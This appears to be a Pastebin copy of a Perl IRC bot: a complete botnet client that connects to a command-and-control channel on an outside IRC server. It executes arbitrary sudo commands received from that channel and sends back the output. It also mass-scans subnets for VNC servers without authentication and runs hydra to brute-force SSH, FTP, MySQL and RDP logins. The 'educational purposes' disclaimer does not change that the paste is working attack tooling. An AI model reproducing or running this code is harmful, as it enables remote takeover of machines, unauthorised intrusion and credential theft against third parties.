independentt

IRC Bot (perl) by independent

Jan 15th, 2017
21,126
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #For educational purposes or for use on your network only
  2. #This script has been modified from the original source.
  3. #Thanks to the real owner of it.
  4. #Get on my IRC Network if you need explainations on how you can use this script.
  5.  
  6.  
  7. use IO::Socket;
  8. use IO::Socket::INET;
  9. use threads;
  10. use threads::shared;
  11. use Errno qw(EAGAIN);
  12. use warnings;
  13. my $lines;
  14. our @results : shared;
  15. our $todo = 0;
  16. our $contatore = 0;
  17. my $orig_thread = "yes";
  18. my $start;
  19. my $end;
  20. my $out_file;
  21. my $range = 99999;
  22. my $random_number = int(rand($range));
  23. my @VNC_PORTS = qw/5900 5901 5902 5903 5904 5905 5906 5907 5908 5909/;
  24. my @hydra_PORTS  = ( [3306, 'MySQL'], [22, 'SSH'], [21, 'FTP'], [3389, 'RDP'] );
  25. my $splits = 8; # Creates 2^N processes.
  26. our $subnet;
  27. my $nick = "b0t$random_number";# nick
  28. my $secureport = "6667";
  29. my $ircnet = "irc-1.iownyour.biz";
  30. my $canale = "#powercc";
  31. my $answer;
  32. my $sk = IO::Socket::INET->new(PeerAddr=>"$ircnet",PeerPort=>"$secureport",Proto=>"tcp") or die "Can not connect on server!\n";
  33. $sk->autoflush(1);
  34. print $sk "USER $nick 0 * :Robot made by independent \r\n";
  35. print $sk "NICK $nick \r\n";
  36.  
  37.  while ($answer = <$sk>) {
  38.    
  39.     if($answer =~ m/^PING (.*?)$/gi) #Answer ping requests
  40.     {
  41.        
  42.         print $sk "PONG ".$1."\r\n";
  43.         print $sk "JOIN $canale \r\n";
  44.     }
  45.     if ($answer=~ /!help/) {
  46.     printa("Scan by independent: list , reload , die , sudo <cmd> , scan <ip>");
  47.   }
  48.   if ($answer=~ /!list/)
  49.   {
  50.  
  51.     my $file = 'xploits.log';
  52.     open my $fh, '<', $file or warn "Could not open '$file' $!\n";
  53.  
  54.     while (my $lines = <$fh>) {
  55.       chomp $lines;
  56.       if ($lines=~ /host/) {
  57.         printa("$lines");
  58.       }
  59.     }
  60.   }
  61.   if ($answer=~ /!reload/)
  62.   {
  63.     printa("Reloading...");
  64.     my @cmd = ("sudo pkill perl && sudo perl scan.pl && sudo pkill hydra");
  65.     system(@cmd);
  66.   }
  67.   if ($answer=~ /!die/)
  68.   {
  69.     printa("Dying...");
  70.     my @cmd = ("sudo pkill perl && sudo pkill hydra");
  71.     system(@cmd);
  72.   }
  73.   if ($answer=~ /!sudo\s+(.*)/)
  74.   {
  75.         my $command = $1;
  76.         printa("Done: $command ");
  77.     my $cmd = "sudo $command";
  78.     my @output = `$cmd 2>&1 3>&1`;
  79.     foreach(@output) {
  80.       printa("$_\r\n");
  81.     }
  82.   }
  83.  
  84.  
  85.   if ($answer=~ /!scan (.+)/)
  86.   {
  87.  
  88.  
  89.     $todo = 0;
  90.     $subnet = $1;
  91.     if ($subnet =~ m/^\d{1,3}\.\d{1,3}\.\d{1,3}\.?\*?/) {
  92.       $subnet =~ s/^(\d{1,3}\.\d{1,3}\.\d{1,3}).*/$1/;
  93.       $subnet .= ".";
  94.       printa("Scanning subnet ${subnet}x\n");
  95.  
  96.       CHECK: {
  97.         unless ($splits >= 0 && $splits <= 8) {
  98.           die "ERROR: Do not split $splits times--that makes no sense.\n";
  99.         }
  100.       }
  101.  
  102.       # Ugly, but this works.
  103.       DivideWork() if $splits >= 1;
  104.       DivideWork() if $splits >= 2;
  105.       DivideWork() if $splits >= 3;
  106.       DivideWork() if $splits >= 4;
  107.       DivideWork() if $splits >= 5;
  108.       DivideWork() if $splits >= 6;
  109.       DivideWork() if $splits >= 7;
  110.       DivideWork() if $splits >= 8;
  111.  
  112.       $start = $todo << (8 - $splits);
  113.       $end = $start + (256 / (2**$splits)) - 1;
  114.  
  115.       foreach ($start .. $end) {
  116.  
  117.         Scan_ALL($_);
  118.  
  119.       }
  120.      }
  121.    
  122.    else {
  123.       printa("Are you brain-dead? Use a correct IP format. ");
  124.     }
  125.  
  126.   }
  127.  
  128. }
  129.   ####################################
  130.  
  131.   sub DivideWork {
  132.     my $pid;
  133.  
  134.     FORK: {
  135.       $todo *= 2;
  136.       if ($pid = fork) {
  137.         # Parent
  138.         ++$todo;
  139.  
  140.         } elsif (defined $pid) {
  141.         # Child
  142.         $orig_thread = "no";
  143.  
  144.         } elsif ($! == EAGAIN) {
  145.         # Recoverable forking error.
  146.         sleep 7;
  147.         redo FORK;
  148.  
  149.         } else {
  150.         # Unable to fork.
  151.         printa("Unable to fork: $!\n");
  152.  
  153.       }
  154.     }
  155.   }
  156.  
  157.  
  158.  
  159.   sub Scan_ALL {
  160.     my $hostnum = shift;
  161.     my $host = $subnet . $hostnum;
  162.     my $sock;
  163.     my $proto_ver;
  164.     my $ignored;
  165.     my $auth_type;
  166.     my $sec_types;
  167.     my $vnc_data;
  168.     $host or printa("ERROR: missing Host IP address Scan_ALL.");
  169.  
  170.     # The host numbers .0 and .255 are reserved; ignore them.
  171.     if ($hostnum <= 0 or $hostnum >= 255) { return; }
  172.  
  173.     # Format things nicely--that crazy formula just adds spaces.
  174.     $results[$hostnum] = "$host";
  175.     $results[$hostnum] .= (" " x (4 - int(log($hostnum)/log(10)))) . " = ";
  176.     foreach my $porti (@VNC_PORTS)
  177.     {
  178.       if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $porti, Proto => 'tcp')) {
  179.  
  180.         $sock->read($proto_ver, 12);
  181.         print $sock $proto_ver;
  182.  
  183.         # Get supported security types and ignore them.
  184.         $sock->read($sec_types, 1);
  185.  
  186.         $sock->read($ignored, unpack('C', $sec_types));
  187.         # Claim that we only support no authentication.
  188.         print $sock "\x01";
  189.  
  190.  
  191.         # We should get "0000" back, indicating that they won't fall back to no authentication.
  192.         $sock->read($auth_type, 4);
  193.  
  194.         # Client initialize.
  195.         print $sock "\x01";
  196.  
  197.         # If the server starts sending data, we're in.
  198.         $sock->read($vnc_data, 4);
  199.         printa("[Xploiting VNC] $host");
  200.         if (unpack('I', $vnc_data)) {
  201.           $results[$hostnum] .= "VNC Vulnerable: $proto_ver\n";
  202.           printa("9,3 [ $porti ] $results[$hostnum] $porti ");
  203.         }
  204.       }
  205.     }
  206.     foreach my $porti (@hydra_PORTS)
  207.     {
  208.       if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $porti->[0], Proto => 'tcp')) {
  209.         close($sock);
  210.         printa("[Cracking " . $porti->[1] . "] $host");
  211.         my @cmdhydra = ("sudo hydra -F -L /user -P /pass $host " . lc($porti->[1]) . " -s " . $porti->[0] . " -v -t 4 -W3 >>xploits.log");
  212.         system(@cmdhydra);
  213.         return;
  214.       }
  215.     }
  216.  
  217.     close($sock);
  218.     return;
  219.   }
  220.  
  221.   sub printa {
  222.     print $sk "PRIVMSG $canale :4,5 $_[0]. \r\n";
  223.   }
RAW Paste Data